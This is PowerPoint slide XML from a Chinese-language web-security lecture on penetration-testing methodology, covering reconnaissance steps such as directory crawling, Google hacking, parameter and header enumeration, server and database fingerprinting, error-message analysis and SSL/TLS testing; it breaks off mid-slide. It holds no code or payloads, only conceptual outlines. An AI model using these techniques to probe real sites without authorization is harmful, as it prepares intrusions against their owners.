        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>渗透攻击框架图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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55576" y="1124744"/>
            <a:ext cx="7632848"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7827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概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站渗透测试主要分成两个阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>识别分析阶段：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>收集网站基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>分析网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>探测网站配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的实现有一个基本的认识，为后面发起攻击做好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>准备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击探测阶段：根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的实现情况</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>选择具体攻击方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>发起攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602704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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>渗透识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与分析阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33259781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简介</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收集与网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容分析：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站渗透测试第一个阶段是收集尽可能多的关于目标应用系统的信息。信息收集与网站内容分析是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>渗透测试的必要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置管理测试：需要分析、测试网站配置情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过分析基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结构和拓扑结构可以获取大量的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序的信息。如源代码、可允许的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法、管理功能、身份认证的方法、基础结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2583993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信息收集与网站内容分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结构测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>网络爬虫，发现网站目录结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>公共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Google hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>发现隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351933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信息收集与网站内容分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入口识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序哪些地方应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，哪些地方应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求中查询字符串参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求表单参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注额外或者不常见、自定义的消息报头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注响应消息报头是否设置或修改了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注响应状态码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>关注不太寻常的响应消息报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36209599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信息收集与网站内容分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用指纹测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应头确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器的类型与版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>响应消息报头字段的排列顺序推测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器的类型与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>畸形的请求探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器的类型与版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>推断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>后台数据库类型及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>推断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用的开源框架及版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>推断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用程序使用的中间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7312099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信息收集与网站内容分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用发现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Google Hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、目录浏览等方法探测非标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过探测非标准端口探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>域名转换等技术探测虚拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一些工具定制或者手动创建特定的请求，能够让服务器生成错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>这些错误代码和错误信息中能够揭露大量的信息，包括服务器系统类型、软件版本、数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16458207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网站配置管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SSL/TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>明确</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>公钥密码体制原理，重点理清楚数字签名、数字证书、公钥、私钥是什么及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>明确通信双方是如何协商加密算法以及公钥是如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>交互</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>明确</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器如何配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>信道</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试网站</a:t>
            </a:r>
            <a:r>
